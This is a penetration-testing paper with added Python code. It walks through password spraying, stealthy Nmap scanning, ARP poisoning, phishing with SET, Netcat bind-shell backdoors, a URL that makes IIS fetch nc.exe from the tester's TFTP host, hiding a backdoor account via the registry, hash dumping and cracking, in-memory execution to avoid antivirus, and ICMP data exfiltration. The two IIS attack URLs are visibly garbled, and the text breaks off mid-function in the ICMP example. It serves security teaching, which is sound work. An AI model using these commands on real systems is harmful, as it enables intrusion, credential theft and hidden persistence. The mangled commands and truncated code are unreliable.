When choosing the password for a spray against OWA, it is important for the tester to know common passwords. An example of a commonly used password is the current season and the year, such as Winter2019 (Najera-Gutierrez & Ansari, 2018, pp. 149-156). That ten-character password contains uppercase, lowercase and numeric characters and satisfies the eight-character minimum that most organizations require. To perform the attack, the attacker visits the OWA login page, attempts a login that fails, and captures the POST request in Burp Suite. The captured request is sent to Burp Suite's Intruder, where the attacker selects the 'sniper' attack type and marks the payload position. The payload position is the username or email address, because that is the only value that changes during the attack; the same password is used against every account to reduce the risk of lockouts (Najera-Gutierrez & Ansari, 2018, pp. 149-156). The attacker then loads the list of usernames or email addresses found or generated during OSINT and HUMINT as the payload list. In some circumstances, Burp Suite must be set to follow redirects and process cookies for the attack to succeed, because OWA redirects after authentication and tracks the session with cookies. Cookies are stored by the user's browser and contain the session ID, user ID and other text; websites use them to maintain a session with the browser so that the user does not have to re-authenticate as other URLs are loaded (Najera-Gutierrez & Ansari, 2018, pp. 149-156). Once the settings are configured, the attack can be launched, and responses whose length or status code differs from the failed login identify the accounts that accepted the password.

Most databases that support web applications are queried with Structured Query Language (SQL), a standard language for database communication and queries that is used by many database engines, not only Microsoft's SQL Server.
Because web applications use SQL, the SQLMap tool is included in the Kali Linux distribution by default and is a popular tool for testing for SQL injection in web applications. SQLMap supports many database management systems and offers enumeration, fingerprinting and takeover options when vulnerabilities allow. The specific tasks the tool can perform are listed on its official GitHub page. The range of options and capabilities that the tool offers makes it a great tool to use during web application security testing, and it should be included in any penetration tester's tool suite (Stamparm, 2014).

Intranet

Scanning and discovery. The Internet and an Intranet are two different types of networks. The Internet is a computer communications network that connects servers and computers around the world (Merriam-Webster, 2019). An Intranet connects computers and servers within one or several local area networks (LANs) and is not reachable from the Internet except through whatever connection the organization maintains through its Internet Service Provider (ISP).

When a tester has access to a target organization's Intranet, they generally can establish a network connection to other devices on it. Access to an organization's Intranet can occur in a couple of different ways. One is a physical connection using an Ethernet cable to an Ethernet port in the organization's office. Another is wireless access through a connection to the organization's wireless access point (Fadyushin & Popov, 2016, pp. 154-159). Once the tester is on the network, discovery of devices on the network and enumeration of those devices are the next steps in performing a penetration test. Reconnaissance is part of the preparation phase, in which the tester gathers as much information as possible about the target before launching an attack.
During reconnaissance, the tester draws on different intelligence sources to learn about the target organization; the phase may also involve internal and/or external network scanning (EC-Council Press, 2017, p. 9).

When a tester needs to perform discovery scanning and enumeration on a network, Nmap is the tool of choice; few, if any, open-source tools match its capabilities. An example of an Nmap command is: nmap -A -v -O -sC 192.168.0.16 -oG scan.txt. The nmap portion at the beginning invokes the program. The options -A, -v, -O and -sC tell Nmap what to do against the IP address or network range: -A enables aggressive scanning (OS detection, version detection, default scripts and traceroute), -v increases verbosity, -O requests OS detection and -sC runs the default script set (the latter two are already implied by -A). The -oG option selects the output format, where 'o' stands for output and 'G' for greppable, a line-per-host format that lets grep search for keywords within the file. The last portion, scan.txt, names the file the output is written to (Lyon, 2008). Table 1, found in Appendix A, shows an example list of some basic Nmap options. These examples only show syntax and not all the ways Nmap can be used; there are examples available that show the tool's true diversity in a variety of scenarios, and depending on what the tester is trying to achieve there are multiple ways to run it. To perform a basic ping scan of a network or range of IP addresses, the following command can be used: nmap -sP -n 10.0.0.1-254 (Lyon, 2008). The -sP option (now an alias for -sn in current Nmap releases) asks Nmap only to determine whether each host is online, and -n tells Nmap not to attempt DNS resolution. Because little data is gathered, the scan is fast. To gather more, a tester can replace -sP with -sT, which tells Nmap to perform a TCP connect scan of the most common ports on each host.
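The reason -oG is worth using is that its output is trivial to post-process. The following added example (not code from Lyon, 2008) parses greppable output from a ping sweep and a subsequent full port scan, extracts the live hosts and the open ports with their detected versions, and produces the follow-up -sV command restricted to those ports. The sample output is constructed to match the -oG layout (tab-separated fields, port entries of the form port/state/protocol/owner/service/rpc_info/version/) and embedded inline so the script runs offline.

```python
"""Parser for Nmap greppable (-oG) output (added example, not from Lyon, 2008)."""
import re

# Constructed sample: a ping sweep, then a full TCP port scan with version detection.
SAMPLE = "\n".join([
    "# Nmap 7.80 scan initiated as: nmap -sn -n 10.0.0.1-254 -oG -",
    "Host: 10.0.0.1 ()\tStatus: Up",
    "Host: 10.0.0.5 ()\tStatus: Up",
    "# Nmap 7.80 scan initiated as: nmap -sV -p- 10.0.0.5 -oG -",
    "Host: 10.0.0.5 ()\tStatus: Up",
    "Host: 10.0.0.5 ()\tPorts: "
    "22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.4.38 ((Debian))/, "
    "445/filtered/tcp//microsoft-ds///\tIgnored State: closed (65532)",
    "# Nmap done -- 1 IP address (1 host up) scanned",
])


def parse_grepable(text):
    """Return (up_hosts, services): the set of live hosts and, per host, a list of
    (port, state, protocol, service, version) tuples taken from 'Ports:' fields."""
    up, services = set(), {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                                  # comments and blank lines
        fields = line.split("\t")
        host = fields[0].split()[1]
        for field in fields[1:]:
            if field.startswith("Status:") and field.endswith("Up"):
                up.add(host)
            elif field.startswith("Ports:"):
                # Split only at ', ' that starts the next port entry; version strings
                # can themselves contain commas.
                for entry in re.split(r", (?=\d+/)", field[len("Ports:"):].strip()):
                    parts = entry.split("/")
                    # port/state/protocol/owner/service/rpc_info/version/
                    port, state, proto, service, version = parts[0], parts[1], parts[2], parts[4], parts[6]
                    services.setdefault(host, []).append((int(port), state, proto, service, version))
    return up, services


def open_ports(services, host):
    """Ports reported 'open' for a host, in scan order."""
    return [port for port, state, *_ in services.get(host, []) if state == "open"]


def version_scan_command(host, ports):
    """The follow-up service-version scan, limited to the ports found open."""
    return "nmap -sV -p {} {}".format(",".join(str(p) for p in ports), host)


if __name__ == "__main__":
    hosts, svc = parse_grepable(SAMPLE)
    for host in sorted(hosts):
        ports = open_ports(svc, host)
        print(host, ports, version_scan_command(host, ports) if ports else "(no port data yet)")
```

Running it lists both live hosts, reports 22 and 80 as open on 10.0.0.5 with their OpenSSH and Apache banners, and prints nmap -sV -p 22,80 10.0.0.5 as the next command; the filtered 445/tcp entry is parsed but not treated as open.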
Port scanning comes into play after initial discovery has been completed (Lyon, 2008). As an example, if a ping scan found only one IP address online, the next step is to enumerate that device. The -p option selects which ports to scan; to scan the entire range of 65,535 TCP ports, the option is -p-. Once the tester knows which ports are open, they can run Nmap with the -sV option, which probes those ports to determine the version of the services running on them. Depending on the version of the running services, there could be known exploitable vulnerabilities. The difficulty with Intranet scanning is the risk of being caught by IDS and IPS. One basic method that keeps discovery traffic below the IP layer is an address resolution protocol (ARP) scan, enabled with the -PR option, which sends ARP requests on the local segment and identifies live devices from their replies without sending IP packets that a router or network IDS would see; Nmap already uses ARP ping by default against targets on the local Ethernet segment. There are multiple ways of performing these steps in Nmap, and more options are available to assist in discovery and enumeration while remaining stealthy (Lyon, 2008).

To avoid detection by IDS and IPS on an Intranet, an attacker needs to blend in with normal traffic. When scanning a network, it is important to limit the rate of packets sent from the tester's computer so the scan looks more like normal traffic than a sweep of the network (Allen & Cardwell, 2016, pp. 331-344). Nmap can slow and spread its timing (-T0 through -T5, --scan-delay, --max-rate), spoof the source IP address (-S), spoof the MAC address (--spoof-mac), hide among decoy sources (-D) and change other packet parameters. Using a combination of the Nmap options in Table 2, found in Appendix A, will assist in stealth scanning (Beggs, 2017, pp. 66-72).

Depending on the situation, poisoning the ARP table is a viable option for attacks that give the penetration tester information that can be used to compromise a system or network.
The tool Cain and Abel can perform ARP poisoning after the pentester has placed their NIC or WNIC in promiscuous mode and obtained a list of devices by sniffing traffic on the network. After obtaining the list, the tester determines which host they want to impersonate and filters the sniffer to show only that device's traffic. Cain and Abel performs a man-in-the-middle attack by sending the victim machine an unsolicited ARP reply that maps the default gateway's IP address to the tester's MAC address, and sending the default gateway an ARP reply that maps the victim's IP address to the tester's MAC address. At this point, the victim machine thinks the pentester is the default gateway and the default gateway thinks the pentester is the victim machine. Cain and Abel then captures the packets flowing through the tester's machine, and analysis of those packets for credentials, PII and other sensitive information can begin (Sanders, 2017, pp. 28-30). Figure 3, found in Appendix B, shows a graphical representation of an ARP table before and after ARP poisoning.

Another popular packet sniffing tool is Wireshark. When trying to sniff a network, it is easiest on a hub network rather than a switched network, because a hub is a physical-layer (layer 1) repeater that sends every frame out of every port all the time, which makes sniffing much easier. A switch operates at the data link layer (layer 2) and forwards each frame only out of the port associated with the destination MAC address in its MAC address table, so other stations' unicast traffic never reaches the tester's port. Poisoning the ARP caches of the other devices on the LAN so that they associate the default gateway's IP address with the tester's MAC address forces their outbound traffic through the tester's computer, which recreates the visibility of a hub. With IP forwarding enabled on the tester's machine so that it relays the packets on to the real gateway and back to the victims, the victims keep working while Wireshark captures everything that passes through.
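The two-sided ARP exchange described above, as an added example that is not Cain and Abel's or Sanders' code: it builds the pair of unsolicited ARP replies that poison the victim and the gateway, parses them back, and runs them through a small ARP watcher of the kind a defender deploys, which keeps an IP-to-MAC table and alerts when an address changes. The victim, gateway and tester addresses are constructed, and the frames are only built and parsed as bytes, never sent.

```python
"""ARP reply construction and ARP-spoof detection (added example, not from Sanders, 2017)."""
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet + ARP reply frame saying 'sender_ip is at sender_mac', unicast to target."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)          # Ethernet/IPv4, opcode 2
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip), or None if not IPv4 ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = frame[22:28], frame[28:32], frame[32:38], frame[38:42]
    return op, mac_str(sha), ip_str(spa), mac_str(tha), ip_str(tpa)


class ArpWatch:
    """Defender side: remembers which MAC each IP has claimed and reports changes."""

    def __init__(self):
        self.table = {}

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        _, sender_mac, sender_ip, _, _ = parsed
        known = self.table.get(sender_ip)
        self.table[sender_ip] = sender_mac
        if known and known != sender_mac:
            return "%s changed from %s to %s" % (sender_ip, known, sender_mac)
        return None


# Constructed LAN: (ip, mac) of the victim, the default gateway and the tester.
VICTIM = ("10.0.0.20", "aa:aa:aa:aa:aa:20")
GATEWAY = ("10.0.0.1", "aa:aa:aa:aa:aa:01")
TESTER = ("10.0.0.66", "de:ad:be:ef:00:66")


def poison_frames():
    """The pair of replies that puts the tester between victim and gateway."""
    to_victim = build_arp_reply(TESTER[1], GATEWAY[0], VICTIM[1], VICTIM[0])    # "gateway is at tester"
    to_gateway = build_arp_reply(TESTER[1], VICTIM[0], GATEWAY[1], GATEWAY[0])  # "victim is at tester"
    return to_victim, to_gateway


def run_demo():
    """Feed legitimate replies, then the poison, to the watcher; returns its alerts."""
    watch = ArpWatch()
    legitimate = [
        build_arp_reply(GATEWAY[1], GATEWAY[0], VICTIM[1], VICTIM[0]),
        build_arp_reply(VICTIM[1], VICTIM[0], GATEWAY[1], GATEWAY[0]),
    ]
    alerts = [watch.observe(frame) for frame in legitimate + list(poison_frames())]
    return [alert for alert in alerts if alert]


if __name__ == "__main__":
    for alert in run_demo():
        print("ALERT:", alert)
```

The watcher stays quiet for the genuine replies and raises two alerts for the poison, one for each address that suddenly claims the tester's MAC; that IP-to-MAC flip is the indicator tools such as arpwatch and switch dynamic ARP inspection key on.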
As the tester's machine relays packets, Wireshark captures them. Just like Cain and Abel, Wireshark can analyze the packets offline for credentials, keys and any other sensitive information (Ali, Allen, & Heriyanto, 2014, pp. 323-327).

Network scanning and device enumeration are key during the early stages of a penetration test and security analysis. When the network has been scanned and devices have been footprinted, vulnerability scanning is an appropriate next step, and there are tools to assist a tester during this stage. OpenVAS is a collection of security tools that perform vulnerability management functions. It was developed with a client-server architecture, where the clients request vulnerability scans from the server that performs them. Because OpenVAS is modular, multiple scans can run simultaneously (Ali, Allen, & Heriyanto, 2014, pp. 323-327). In summary, preparation for an attack requires reconnaissance to learn about the targets, and the discovery and enumeration phases build on that intelligence with internal and external scanning.

Exploitation and gaining access. Gaining access to target devices requires exploiting the vulnerabilities found during the discovery and enumeration phases. There are two main classifications of attacks. The first is a direct attack, where a target network's vulnerabilities are exploited to gain access to potentially critical systems or to obtain information that can be used to launch indirect attacks. The second is an indirect attack, in which an attacker chains sequential attacks to compromise the target or targets; spear phishing and watering-hole attacks are examples (Sood & Enbody, 2014, pp. 37-44).

Patel (2013) references the Social Engineering Toolkit (SET), which is installed by default on the Kali Linux distribution and is a diverse toolset for social engineering attacks.
The toolkit can create phishing emails and malicious attachments, and it can create and host phishing web pages, known as the web attack vector. SET contains a mass-mailer option with which a penetration tester can send a phishing email to many addresses within an organization at once (Patel, 2013, pp. 37-44). SET has a list of website templates for the web attack vector, but it can also clone a website when a URL is provided: the tool performs a GET request, grabs the HTML of the site, and builds the clone from that. Using tools like SET assists in testing an organization's employees and their ability to recognize phishing attempts. If a user enters their login credentials into a clone of, for example, their work Office 365 login page, the penetration tester obtains the user's organizational credentials. If the user has administrative permissions, either locally on their computer or on the domain, the penetration tester can use those credentials to gain access to the organization's network (Patel, 2013, pp. 37-44).

When looking for information on a machine or for ways to access it, enum4linux is a good source for enumerating Windows and Samba hosts over the server message block (SMB) and RPC services, with limited lightweight directory access protocol (LDAP) queries against domain controllers. Using valid credentials, administrative or not, it is possible to find an accessible SMB share and, depending on the permissions, a share that can be modified or even used to stage files for remote command execution. If a domain controller is enumerated, the penetration tester could obtain a list of all Active Directory (AD) users, groups, devices and shares. This step can be performed during enumeration and/or post-exploitation. If the tester does not have a username and password, it is still possible to find shares and information open to the group 'Everyone' or to anonymous (null) sessions.
The 'Everyone' group can be an AD or local group and allows anyone to access the resource it is assigned to, whether or not they have an AD account. In the case of a file share that 'Everyone' can access, a tester can read the share, and write to it if the permissions allow, after locating it with enum4linux. If the tester has already compromised a workstation and/or obtained credentials, those credentials can be used to discover and access more shares on the network, depending on the permissions granted to them. The enum4linux help output can be found in Figure 4, located in Appendix B (Velu, 2017, pp. 124-125).

In the realm of exploitation, Metasploit is the most commonly used tool for executing exploits against known vulnerabilities. There are two versions: Metasploit Pro, the paid version that requires a license, and Metasploit Framework, the free version that is installed in all Kali Linux distributions. "Metasploit is currently the world's leading penetration-testing tool, and one of the biggest open-source projects in information security and penetration testing. It has totally revolutionized the way we can perform security tests on our systems" (Teixeira, Singh, & Agarwal, 2018, p. 8). Rapid7, a security product vendor and managed security services provider (MSSP), owns both Metasploit Pro and Metasploit Framework (Condon, 2019).

The Metasploit Framework (MSF) is organized into directories of modules. Each directory holds modules that serve a specific purpose: scanning, auxiliary functions, exploitation or post-exploitation. When a penetration tester is trying to gain access to a device, the library of exploitation modules in MSF is second to none, and it is constantly updated with new modules. The command for updating MSF is msfupdate; on Kali Linux, updating the metasploit-framework package through apt accomplishes the same thing.
The tool can also be installed on Windows and macOS (Teixeira, Singh, & Agarwal, 2018, pp. 8-17). Modules are selected with the use command followed by the module path. Users can search modules by typing search and a keyword; for example, search SQL lists all modules with SQL in their name or description. Before executing a module, its options are set with the set command, and the module is then launched with run (or exploit for exploit modules). See Figure 5, located in Appendix B, for an example of setting and executing a Metasploit module (Teixeira, Singh, & Agarwal, 2018, pp. 8-17).

Persistence and spreading. Spreading across the network means gaining access to other servers, workstations and whole networks once the penetration tester has access to one or more devices. Persistence involves setting up a backdoor into the compromised machine or machines for future access. EC-Council (2017) references Netcat in the book Ethical Hacking and Countermeasures: Web Application and Data Servers. The Netcat chapter provides the reader with steps to set up a backdoor on a compromised computer using either TFTP or an injected URL. An example is sending a web server the following URL: :\ (EC-Council, 2017, p. 54). The URL asks the web server to list the contents of the C drive by executing Windows' cmd.exe. Once the pentester has command execution on the target, the TFTP client can be used to upload Netcat to the Internet Information Services (IIS) server with the following command: ’sIP>/c+TFTP+i+192.168.0.1+GET+nc.exe (EC-Council, 2017, p. 54). The URL tells the IIS server to run the TFTP client and fetch nc.exe, which is Netcat, from the tester's TFTP server at 192.168.0.1.
Once Netcat is on the IIS server, it can be executed as a backdoor that listens on a specific port for connections from the attacker's computer. An example of such a command is nc -L -p 12345 -d -e cmd.exe. Respectively, the options mean: listen persistently and re-listen after each connection closes (-L, a Windows-only option), on port 12345 (-p 12345), detached from the console so no window appears (-d), executing cmd.exe for each connection (-e cmd.exe) (EC-Council, 2017, p. 54).

If there is an open file share, or the penetration tester has accessed a file share with modify permissions, it is possible to copy Netcat to the target device and, given some way to execute it, obtain a remote shell. Writing a file to a share does not by itself run it; the tester still needs command execution on the host, whether from an exploit, a scheduled task or a user opening the file. On a Windows machine the pentester runs the following command: nc -l -p 6996 -e cmd.exe. For a Linux machine the command is the same, with cmd.exe replaced by /bin/bash. The nc portion calls Netcat, -l means listen, -p 6996 means port 6996, and -e cmd.exe means execute the named program with its input and output connected to the socket. Because Netcat is listening on port 6996 and runs whatever it receives in the operating system's command line interface (CLI), the penetration tester connects from their own device with nc <target IP> 6996, which establishes the Netcat connection between the tester's machine and the target (Yerrid, 2013, pp. 33-35). Note that many Linux distributions ship a Netcat build without the -e option; such a bind shell needs a build that supports it (for example nc.traditional) or a different tool. Because IIS can have remote code execution vulnerabilities, depending on the version running, the penetration tester could use Netcat to gain access to the server and establish hidden persistence on a vulnerable server as part of a penetration test. This only gives the tester the same permissions as the application running, so privilege escalation might be required to gain administrative access to the Windows server (EC-Council, 2017, p.
54).

Mimikatz is a well-known tool that can perform a multitude of functions to assist in escalating privileges, gaining initial access, and gathering Active Directory information about user accounts and group policies. Mimikatz is also known for its pass-the-hash capability, which abuses a design property of NTLM authentication: the NT hash of the password, not the password itself, is the key used to compute the authentication response, so possessing the hash is as good as possessing the password when authenticating to Windows devices. It is important not only to understand how NTLM functions and what tools can exploit its weaknesses, but also to know how to use the tool, which is why the author gives several other examples of its use in real scenarios (Sharma, 2017, pp. 238-240).

Clercq (2004) and Halton & Weaver (2016) explain the differences between LM, NT, NTLMv1 and NTLMv2 hashes and the John the Ripper and Hashcat syntax for cracking each. Halton & Weaver (2016) review the history of each hash and the steps for cracking them in detail. The LM hash is the oldest way Windows stored account passwords: it uppercases the password, pads or truncates it to 14 characters and splits it into two 7-character halves that are each used as a DES key, which makes it trivially crackable by today's standards. The NT hash, also called NTHash and often loosely called the NTLM hash, is the unsalted MD4 digest of the UTF-16LE encoding of the password; it is harder to crack than LM and is the standard on modern Windows machines. Luckily, cracking it is not always necessary. The most notable weakness is pass-the-hash: because the NTLM challenge-response is computed from the NT hash, an attacker who has obtained the hash (from process memory or the SAM, for instance) can use it directly to authenticate to a device. The device forwards the challenge and response to the domain controller, which validates them against its own copy of the hash; if they match, the credentials are accepted. LM and NT hashes are the forms in which Windows devices store passwords locally, whereas Net-NTLMv1 and Net-NTLMv2 are the challenge-response values seen on the network.
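To make the NT hash concrete, the following added example (not code from Sharma, Clercq, or Halton & Weaver) computes it as MD4 over the UTF-16LE password, parses constructed pwdump-style lines of the kind a SAM dump produces (user:RID:LM:NT:::), and runs the straight wordlist attack that John the Ripper and Hashcat perform at far greater speed. MD4 is implemented in pure Python because hashlib no longer exposes it on many modern OpenSSL builds; it is correct but far too slow for real cracking. The LM field in the sample lines is the well-known value Windows stores when LM hashing is disabled.

```python
"""NT hash computation and a wordlist attack (added example, not from the cited sources)."""
import struct


def _lrot(x, n):
    x &= 0xFFFFFFFF
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data):
    """MD4 digest (RFC 1320). Pure Python: fine for a demo, too slow for real cracking."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    i3 = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, range(16), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (i3, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a = list(h)
        for fn, order, shifts, k in rounds:
            for i, j in enumerate(order):
                idx = (-i) % 4        # registers rotate a, d, c, b each step
                val = a[idx] + fn(a[(1 - i) % 4], a[(2 - i) % 4], a[(3 - i) % 4]) + x[j] + k
                a[idx] = _lrot(val, shifts[i % 4])
        h = [(u + v) & 0xFFFFFFFF for u, v in zip(h, a)]
    return struct.pack("<4I", *h)


def nt_hash(password):
    """NT hash: unsalted MD4 of the UTF-16LE password, as a lowercase hex string."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(line):
    """user:rid:lm_hash:nt_hash::: as written by hashdump-style tools."""
    user, rid, lm, nt = line.split(":")[:4]
    return user, int(rid), lm.lower(), nt.lower()


def crack_nt(target_nt, wordlist):
    """Straight wordlist attack: first candidate whose NT hash matches, else None."""
    target_nt = target_nt.lower()
    for candidate in wordlist:
        if nt_hash(candidate) == target_nt:
            return candidate
    return None


# Constructed SAM dump lines (pwdump format) and a small candidate list.
DUMP = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    "svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
]
WORDLIST = ["Winter2019", "Summer2019", "letmein", "password", "Password1"]


def crack_dump(lines=DUMP, wordlist=WORDLIST):
    """Returns {user: cracked_password_or_None}. Because the hash is unsalted, identical
    passwords give identical hashes and crack together; that same property is why
    pass-the-hash works without cracking at all."""
    cache, results = {}, {}
    for line in lines:
        user, _, _, nt = parse_pwdump(line)
        if nt not in cache:
            cache[nt] = crack_nt(nt, wordlist)
        results[user] = cache[nt]
    return results


if __name__ == "__main__":
    print(crack_dump())
```

Both constructed accounts share the NT hash of "password" and are cracked with a single MD4 computation; a hash not in the wordlist, for example nt_hash("Winter2020"), comes back as None.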
The commands to crack LM hashes with a wordlist using Hashcat and John the Ripper (JTR) are as follows, where hashes.txt holds the captured hashes, one per line:

Hashcat: hashcat -m 3000 -a 0 hashes.txt wordlist.txt (Steube, 2019)
John the Ripper: john --format=lm --wordlist=wordlist.txt hashes.txt (Halton & Weaver, 2016, pp. 223-225)

The commands for cracking NT hashes using JTR and Hashcat are as follows:

John the Ripper: john --format=nt --wordlist=wordlist.txt hashes.txt (Halton & Weaver, 2016, pp. 223-225)
Hashcat: hashcat -m 1000 -a 0 hashes.txt wordlist.txt (Steube, 2019)

In Hashcat, -m selects the hash mode and -a 0 selects a straight wordlist attack; -a 3 would instead run a mask (brute-force) attack, which takes a mask rather than a wordlist. NTLMv1, also known as Net-NTLMv1, is a challenge-response protocol that allows Windows machines to authenticate to a domain. It is an older version of domain authentication and is now deprecated, but older networks or networks with legacy hardware and software may still use it. NTLMv2 is the more secure version and has been the default since Windows 2000 (Clercq, 2004). The commands for cracking captured NTLMv1 responses are: John the Ripper: john --format=netntlm --wordlist=wordlist.txt hashes.txt; Hashcat: hashcat -m 5500 -a 0 hashes.txt wordlist.txt. The commands for NTLMv2 are: John the Ripper: john --format=netntlmv2 --wordlist=wordlist.txt hashes.txt; Hashcat: hashcat -m 5600 -a 0 hashes.txt wordlist.txt (Steube, 2019).

Sood & Enbody (2014) explain that gaining and maintaining access to a computer often does not require a direct attack. The authors explain the principles behind the use of phishing emails to gain access to a target machine. In the spear phishing model they present, located in Appendix B as Figure 6, the attacker sends an email to the target user containing one or more malicious attachments that infect the target computer with a remote access trojan (RAT). A RAT provides the attacker with a backdoor into the target machine. Once the RAT is on the target machine, it will either spread itself across the target network, or the attacker will use it to spread more RATs across the network (Sood & Enbody, 2014, p.
23).

If the attacker is not caught by an IDS/IPS, then as they spread the RAT across the target network they will eventually find a server that holds sensitive data, and at that point they can exfiltrate it in a manner that eludes detection. This completes the attack in the spear phishing example, but there are steps after exfiltration. One that usually follows is covering tracks, which includes deleting logs of the activity, removing any malware used to gain access to the machine, and reversing any changes made to the machine's configuration (Sood & Enbody, 2014, p. 23).

Another way to maintain persistence and exfiltrate data from a target device is to create a new user account and add it to local and domain groups, which helps the penetration tester blend in with the normal activity on the computer. The new account should be hidden from the Windows logon screen, which is done with the following registry edit: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v account_name /t REG_DWORD /d 0. The registry path can vary depending on the version of Windows on the target, but the general idea is the same. Note that this only hides the account from the logon user list; it is still visible to net user, in the SAM or in Active Directory, and a defender who audits account creation (Windows event ID 4720) will still see it (Velu, 2017, pp. 471-473).

Data gathering and extraction. Netcat can exfiltrate data from a target device. To do so, the Netcat remote shell needs a connection to the attacker's computer, and the penetration tester needs to know the path of the file to be exfiltrated on the target. The file is read out through the shell with a command such as cat, or tail, which shows only the last lines of the file; for example, a penetration tester wanting to dump the Linux passwd file would run tail /etc/passwd (Yerrid, 2013, pp. 40-41). On modern Linux systems /etc/passwd holds the account list but not the password hashes, which live in /etc/shadow and are readable only by root; with the shadow file in hand, the attacker can crack the hashes offline at their leisure.
An issue with data exfiltration is the risk of being caught by data loss prevention (DLP) controls. Random access memory (RAM) holds a significant amount of information for an attacker. Tools like Belkasoft RAM Capturer and Mandiant Memoryze can capture system memory as a single image file that can then be downloaded. Both tools are uploaded to the compromised machine and run there to dump the system's memory (Velu, 2017, p. 393). A penetration tester who tries to capture a target's memory this way is likely to be caught by endpoint protection. To reduce that risk, Metasploit's Meterpreter can run an executable entirely in the target's memory with a command of the form execute -H -m -d calc.exe -f followed by the path of the program to run. The command launches the calculator (calc.exe) as a decoy process and maps the memory acquisition program named by -f into it from the tester's machine without writing it to the target's disk; -H hides the window. Because the uploaded program never touches disk and the process list shows only the decoy, file-based anti-virus scanning is avoided and the activity is less obvious to an observer, though the memory dump itself remains a large and unusual operation that host monitoring can notice (Velu, 2017, pp. 394-395).

When exfiltrating information from a target on an organization's domain, the Security Account Manager (SAM) database is a prime target. The SAM contains the usernames and password hashes of the local accounts on a Windows system, stored as LM or NT hashes in a registry hive. The hive file is %SystemRoot%\System32\config\SAM and it is mounted in the registry at HKLM\SAM; domain account hashes are held instead in the NTDS.dit database on domain controllers (Teixeira, Singh, & Agarwal, 2018). Metasploit has a module called Smart Hashdump that can retrieve the password hashes from the SAM to the penetration tester's machine, where the tester can crack them offline.
Once the Meterpreter session is running on the target and has been backgrounded in the tester's console, the tester can run the module at the path post/windows/gather/smart_hashdump. After the module's options are set (at minimum the SESSION to run against) and it finishes, the Windows password hashes are saved to a file on the tester's machine (Teixeira, Singh, & Agarwal, 2018, pp. 198-200).

Lastly there is the Data Exfiltration Toolkit (DET), a tool designed to test data loss prevention (DLP). DET can exfiltrate data over different protocols and through services such as Gmail and Twitter. DET uses a client-server architecture, so a server is set up on the tester's machine and a client is installed on the target. Velu (2017) provides the steps for downloading and configuring the tool. The tool is downloaded from GitHub with the command git clone followed by the repository URL. Once the repository is cloned and the tester has changed into its directory, the commands pip install -r requirements.txt and python det.py complete the installation. This is necessary because DET is not installed on Kali Linux by default (Velu, 2017, pp. 469-471). The tester starts the DET server with: python det.py -c ./config-sample.json -p icmp -L. This starts the server (-L) with the configuration file config-sample.json and the ICMP plugin (-p icmp), listening for data carried in Internet Control Message Protocol (ICMP) packets. Once setup is complete, the tester can exfiltrate data from the target over ICMP, which disguises the transfer as ping traffic and can help evade DLP, unless the DLP or IDS inspects ICMP payload sizes and contents (Velu, 2017, pp. 469-471).

Covering tracks. Removing evidence and indicators of compromise is the second to last step of a penetration test.
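Before the clean-up steps, the ICMP channel that DET's icmp plugin relies on, as an added example that is not DET's code: the client side chunks a file into ICMP echo request payloads numbered by the sequence field, the server side picks its packets out by identifier and reassembles them regardless of arrival order, and a detector applies the check a DLP or IDS can use, namely that echo payloads from stock ping clients have a fixed and predictable shape (32 bytes of "abcdefghijklmnopqrstuvwabcdefghi" on Windows; 56 bytes whose bytes after the timestamp equal their own offset on Linux). The secret and the identifier are constructed; packets are built and parsed as bytes and never sent.

```python
"""ICMP echo exfiltration and a payload-shape detector (added example; not DET's code)."""
import struct

ICMP_ECHO_REQUEST = 8

# What the standard ping clients send (constructed from their well-known patterns).
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"   # 32 bytes
LINUX_PING_PATTERN = bytes(range(0x10, 0x38))                # bytes 16..55 equal their offset


def icmp_checksum(data):
    """RFC 1071 ones-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(ident, seq, payload):
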